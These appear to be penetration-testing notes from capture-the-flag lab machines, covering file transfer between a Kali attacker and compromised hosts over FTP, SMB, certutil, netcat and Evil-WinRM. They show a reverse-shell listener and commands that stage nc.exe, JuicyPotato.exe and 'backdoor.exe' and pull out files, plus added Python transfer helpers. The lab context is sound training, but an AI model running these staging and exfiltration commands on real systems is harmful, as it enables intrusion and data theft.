File Transfer between Windows and Linux Machines
Method 1 - FTP
Sometimes FTP is enabled for the “anonymous” user with any (or a blank) password. Log in, check what the anonymous account can see, and try an upload; in the session below the anonymous user can also write to the root of the FTP site, so files can be pushed onto the Windows host.
$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> exit
421 Service not available, remote server has closed connection
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ echo "sample file rchitect" > test.txt
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
ftp: connect: Connection timed out
ftp> ^C
ftp> exit
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:rocky): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
22 bytes sent in 0.00 secs (477.4305 kB/s)
ftp> exit
221 Goodbye.
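The check above, automated with Python's standard ftplib as an added example (this is not code from the original notes): log in as anonymous, list the root, then store and immediately delete a marker file to learn whether the account can write. The target host and port are arguments (the default IP is just the one from this box); the FakeFTP class is a constructed stand-in that mimics the Microsoft FTP Service responses so the script can be exercised offline.

```python
import ftplib
import io
import os


def probe_anonymous_ftp(host, port=21, timeout=5, ftp_factory=ftplib.FTP):
    """Return what an anonymous FTP login on host:port is allowed to do.

    ftp_factory is ftplib.FTP in real use; pass a fake to run offline.
    """
    result = {"host": host, "login": False, "listing": [],
              "writable": None, "error": None}
    ftp = ftp_factory()
    try:
        ftp.connect(host, port, timeout=timeout)
        # Microsoft FTP asks for an e-mail address as the anonymous password;
        # any string is accepted, so send a recognisable one.
        ftp.login("anonymous", "anonymous@example.com")
        result["login"] = True
        result["listing"] = ftp.nlst()
        # Writability check: store a small marker, then remove it so the
        # only trace left behind is the server's log entry.
        marker = ".ftp_probe_%d" % os.getpid()
        try:
            ftp.storbinary("STOR " + marker, io.BytesIO(b"probe\n"))
            result["writable"] = True
            ftp.delete(marker)
        except ftplib.error_perm:
            result["writable"] = False
    except ftplib.all_errors as exc:   # timeouts, refused, 530, ...
        result["error"] = str(exc)
    finally:
        try:
            ftp.quit()
        except Exception:
            pass
    return result


class FakeFTP:
    """Constructed stand-in for ftplib.FTP so the probe runs offline.

    Mimics the session in the notes: anonymous login accepted, empty root
    listing, uploads allowed or denied depending on the flag.
    """

    def __init__(self, writable=True):
        self.writable = writable
        self.files = {}

    def connect(self, host, port=21, timeout=None):
        return "220 Microsoft FTP Service"

    def login(self, user="", passwd=""):
        if user != "anonymous":
            raise ftplib.error_perm("530 User cannot log in.")
        return "230 User logged in."

    def nlst(self, *args):
        return sorted(self.files)

    def storbinary(self, cmd, fp, blocksize=8192):
        if not self.writable:
            raise ftplib.error_perm("550 Access is denied.")
        self.files[cmd.split(" ", 1)[1]] = fp.read()
        return "226 Transfer complete."

    def delete(self, filename):
        self.files.pop(filename, None)
        return "250 DELE command successful."

    def quit(self):
        return "221 Goodbye."


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.116"
    print(probe_anonymous_ftp(target))
```

Run it as `python3 ftp_probe.py 10.10.10.116`; a `writable: True` result means anything you `put` will land on the server, which on a Windows IIS box is worth cross-checking against the web root.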
Method 2 - SMB Transfer (Linux to Windows)
If we have a normal reverse shell on the Windows machine, an SMB transfer works in most cases: host a share on the attacking machine with Impacket's smbserver.py and copy from its UNC path.
┌──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.116] 49674
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv>
SMB share transfer between Linux and Windows
Start smbserver.py with the -smb2support option, because most current Windows machines have SMB1 disabled. Without it the server speaks only SMB1, and the client's copy fails with “Cannot find path ... because it does not exist” even though the share is up, as shown below. The copy from Linux to Windows succeeded once -smb2support was specified. The working runs also set a username and password on the server and authenticate with net use /u:, which matters because recent Windows builds refuse unauthenticated guest access to SMB shares by default.
PS C:\Users\Destitute\Documents\temp>
net use \\10.10.14.4\share\
PS C:\Users\Destitute\Documents\temp>
copy \\10.10.14.4\share\nc.exe nc.exe
PS C:\Users\Destitute\Documents\temp> copy : Cannot find path '\\10.10.14.4\share\nc.exe' because it does not exist.
At line:1 char:1
+ copy \\10.10.14.4\share\nc.exe nc.exe
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\10.10.14.4\share\nc.exe:String) [Copy-Item], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.CopyItemCommand
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
On Windows, with -smb2support enabled on the server, the copy succeeds:
PS C:\Users\Destitute\Documents\temp>
copy \\10.10.14.4\share\nc.exe nc.exe
ls
Directory: C:\Users\Destitute\Documents\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:23 59392 nc.exe
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/10/2018 23:07 Administrator
d----- 12/10/2018 23:12 DefaultAppPool
d----- 12/10/2018 20:16 Destitute
d-r--- 12/10/2018 20:08 Public
d----- 12/10/2018 23:54 test
d----- 12/10/2018 23:40 WWW Anon Access
cd Destitute
cd Documents
net use \\10.10.14.12\share /u:df df
The command completed successfully.
copy \\10.10.14.12\share\JuicyPotato.exe JuicyPotato.exe
ls
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/03/2022 00:07 347648 JuicyPotato.exe
net use /d \\10.10.14.12\share
\\10.10.14.12\share was deleted successfully
Method 3 - Certutil
Run Python's built-in HTTP server on the Linux machine to host the file. By default it listens on port 8000; any other port can be given as an argument, including 80 (ports below 1024 need root). Be aware that it serves the whole current directory, with a browsable listing, to anyone who can reach the port.
Run the simple HTTP server on the source Linux machine:
┌──(rocky㉿kali)-[~/hckbox/conceal/ftpdump/web]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Use certutil on the destination Windows machine to fetch the file from the Linux machine. Remember to include port 8000 in the URL. certutil keeps a copy of what it fetched in its URL cache (`certutil -urlcache * delete` clears it), and this download pattern is widely flagged by AV/EDR, so expect it to be noisy on a monitored host:
certutil -urlcache -split -f "http://10.10.14.4:8000/backdoor.exe" "backdoor.exe"
dir
Volume in drive C has no label.
Volume Serial Number is 0DCA-A9F4
Directory of C:\Users\Destitute\Documents\temp
09/03/2022 00:54 <DIR> .
09/03/2022 00:54 <DIR> ..
09/03/2022 00:54 7,168 backdoor.exe
03/03/2022 00:23 59,392 nc.exe
2 File(s) 66,560 bytes
2 Dir(s) 9,707,196,416 bytes free
The same can be validated on the Linux machine running http.server. certutil normally requests the file twice, so two GET lines for a single download are expected:
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.116 - - [08/Mar/2022 19:54:35] "GET /backdoor.exe HTTP/1.1" 200 -
10.10.10.116 - - [08/Mar/2022 19:54:35] "GET /backdoor.exe HTTP/1.1" 200 -
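As an added example (not part of the original notes), the Python script below replaces `python -m http.server` with a small server that serves only the files in the chosen staging directory, refuses directory listings (so a stray visitor to http://10.10.14.4:8000/ does not get a catalogue of your tools), and logs the SHA-256 of every file it hands out so the value can be compared with `certutil -hashfile backdoor.exe SHA256` on the Windows side. The bind address, port and directory are assumed defaults, not values from the notes.

```python
import functools
import hashlib
import http.server
import os
import socketserver
import threading


def sha256_file(path, chunk=1 << 16):
    """Hex SHA-256 of a file, read in chunks so large tools are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


class StagingHandler(http.server.SimpleHTTPRequestHandler):
    """Serve files from one directory; never render an index page."""

    def list_directory(self, path):
        # SimpleHTTPRequestHandler would render an HTML listing of the
        # staging directory here. Deny it instead.
        self.send_error(403, "Directory listing disabled")
        return None

    def send_head(self):
        # Let the parent do the normal work (404s, redirects, headers);
        # if it is about to stream a real file, log the file's digest too.
        f = super().send_head()
        local = self.translate_path(self.path)
        if f is not None and os.path.isfile(local):
            self.log_message("sha256 %s %s", self.path, sha256_file(local))
        return f


def serve(directory, bind="0.0.0.0", port=8000):
    """Start the server in a background thread and return it.

    Bind to the VPN interface address (e.g. 10.10.14.4) rather than
    0.0.0.0 to keep the staging share off the other networks the box is on.
    """
    handler = functools.partial(StagingHandler, directory=directory)
    httpd = socketserver.ThreadingTCPServer((bind, port), handler)
    httpd.daemon_threads = True
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


if __name__ == "__main__":
    import sys
    directory = sys.argv[1] if len(sys.argv) > 1 else "."
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8000
    httpd = serve(directory, port=port)
    print("Serving %s on port %d" % (os.path.abspath(directory),
                                      httpd.server_address[1]))
    try:
        threading.Event().wait()   # block until Ctrl-C
    except KeyboardInterrupt:
        httpd.shutdown()
```

Usage: `python3 staging_server.py ./web 8000`, then the same certutil command as above; the server's log line `sha256 /backdoor.exe <digest>` should match the digest certutil -hashfile prints on the target.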
Method 4 - SMB transfer from Windows to Linux
In this case the source machine is Windows and the destination is Linux. The same SMB share method works in this direction as well.
Run the SMB share service on the Linux machine:
smbserver.py share . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
Map the share with the credentials and use copy on Windows; the file is copied from Windows to the Linux machine (it lands in the directory smbserver.py was started in):
net use \\10.10.14.4\share\ /u:df df
copy result1.log \\10.10.14.4\share\result1.log
Method 5 - Netcat for file transfer
In this scenario both machines are Linux and both have netcat. If netcat is available on the Windows machine, the same method works with Windows on either end.
On the source Linux machine, where the file root1.zip exists (10.10.14.2 is the destination Linux machine's IP); start the listener on the destination first, then run:
nc 10.10.14.2 4444 < /tmp/root1.zip
On the Kali machine (the destination Linux machine, where the file is to be received), start the listener before the sender:
nc -lnvp 4444 > root1.zip
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.58] 36426
┌──(rocky㉿kali)-[~/hckbox/node/zipstore/rootback]
└─$ ls
backup root root1.zip
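Plain nc has two practical weaknesses here: the listener cannot tell when the file is complete (OpenBSD netcat does not close the connection at end of input unless given -N, netcat-traditional needs -q, so the receiver may sit open or cut off early), and nothing checks that the bytes in root1.zip match /tmp/root1.zip. The Python example below is added here (it is not from the original notes and swaps nc for a small script) to show the same push-to-listener pattern with both gaps closed: the sender prefixes the stream with the file length and appends its SHA-256, the receiver stops at exactly that length and verifies the digest. Hosts, ports and file names are placeholders. When you do use plain nc, at least run `sha256sum` on both sides afterwards.

```python
import hashlib
import socket
import struct
import threading

HEADER = struct.Struct("!Q")             # 8-byte big-endian file length
DIGEST_LEN = hashlib.sha256().digest_size  # 32-byte trailer


def send_file(host, port, path, chunk=1 << 16):
    """Connect to a listener (the nc -lnvp side) and push one file."""
    h = hashlib.sha256()
    with open(path, "rb") as fh, socket.create_connection((host, port)) as s:
        fh.seek(0, 2)
        s.sendall(HEADER.pack(fh.tell()))   # tell the receiver how much to expect
        fh.seek(0)
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
            s.sendall(block)
        s.sendall(h.digest())               # integrity trailer
    return h.hexdigest()


def _recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        part = sock.recv(min(1 << 16, n - len(buf)))
        if not part:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += part
    return bytes(buf)


def recv_file(bind, port, out_path, listener=None):
    """Accept one connection (like nc -lnvp), write the file, verify it.

    Returns the hex digest on success; raises ValueError on a mismatch.
    A pre-bound listening socket can be passed in instead of bind/port.
    """
    own = listener is None
    if own:
        listener = socket.create_server((bind, port))
    try:
        conn, _peer = listener.accept()
        with conn:
            (length,) = HEADER.unpack(_recv_exact(conn, HEADER.size))
            h = hashlib.sha256()
            remaining = length
            with open(out_path, "wb") as fh:
                while remaining:
                    block = conn.recv(min(1 << 16, remaining))
                    if not block:
                        raise ConnectionError("short transfer: %d bytes missing" % remaining)
                    fh.write(block)
                    h.update(block)
                    remaining -= len(block)
            expected = _recv_exact(conn, DIGEST_LEN)
        if h.digest() != expected:
            raise ValueError("digest mismatch for %s" % out_path)
        return h.hexdigest()
    finally:
        if own:
            listener.close()


def loopback_demo(src_path, dst_path):
    """Run both ends over 127.0.0.1; returns (sender digest, receiver digest)."""
    listener = socket.create_server(("127.0.0.1", 0))
    result = {}

    def receiver():
        result["recv"] = recv_file("127.0.0.1", 0, dst_path, listener=listener)

    t = threading.Thread(target=receiver)
    t.start()
    result["sent"] = send_file("127.0.0.1", listener.getsockname()[1], src_path)
    t.join()
    return result["sent"], result["recv"]


if __name__ == "__main__":
    import sys
    if sys.argv[1:2] == ["send"]:      # send <host> <port> <file>
        print(send_file(sys.argv[2], int(sys.argv[3]), sys.argv[4]))
    elif sys.argv[1:2] == ["recv"]:    # recv <port> <outfile>
        print(recv_file("0.0.0.0", int(sys.argv[2]), sys.argv[3]))
    else:
        print("usage: send <host> <port> <file> | recv <port> <outfile>")
```

On the Kali side run `python3 xfer.py recv 4444 root1.zip`, then on the source `python3 xfer.py send 10.10.14.2 4444 /tmp/root1.zip`; both ends print the same digest when the copy is intact, and the receiver exits on its own instead of waiting for Ctrl-C.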
Method 6 - Evil-WinRM upload/download
Evil-WinRM is a WinRM shell used to connect from Linux to Windows (WinRM on 5985/5986) with valid credentials; it has built-in upload and download commands.
evil-winrm -i 10.129.96.x -u oliver -p c1cdfunxxxxx
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> cd c:\
*Evil-WinRM* PS C:\> cd programdata
*Evil-WinRM* PS C:\programdata> upload /home/rocky/tool/exp/windows/SharpHound.exe
Info: Uploading /home/rocky/tool/exp/windows/SharpHound.exe to C:\programdata\SharpHound.exe
Data: 1211048 bytes of 1211048 bytes copied
Info: Upload successful!
Downloading works the same way with Evil-WinRM:
*Evil-WinRM* PS C:\programdata> download c:\programdata\20220705164546_BloodHound.zip /home/rocky/tool/exp/windows/20220705164546_BloodHound.zip
Info: Downloading c:\programdata\20220705164546_BloodHound.zip to /home/rocky/tool/exp/windows/20220705164546_BloodHound.zip
Info: Download successful!
Always specify the full destination path when uploading or downloading. Below, the upload was given only a file name as the destination: Evil-WinRM reports “Upload successful!”, but the file does not appear in the target folder. Verify with dir after every transfer rather than trusting the success message.
*Evil-WinRM* PS C:\> cd ProgramData
*Evil-WinRM* PS C:\ProgramData> dir
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
*Evil-WinRM* PS C:\ProgramData>
*Evil-WinRM* PS C:\ProgramData> upload /home/rocky/tool/exp/windows/AD/PowerView.ps1 PowerView.ps1
Info: Uploading /home/rocky/tool/exp/windows/AD/PowerView.ps1 to PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\ProgramData> dir
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
With the full path specified, the upload lands in C:\ProgramData:
*Evil-WinRM* PS C:\ProgramData> upload /home/rocky/tool/exp/windows/AD/PowerView.ps1 C:\ProgramData\PowerView.ps1
Info: Uploading /home/rocky/tool/exp/windows/AD/PowerView.ps1 to C:\ProgramData\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\ProgramData> dir
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/17/2022 5:16 PM 770279 PowerView.ps1
The uploaded file PowerView.ps1 is now listed.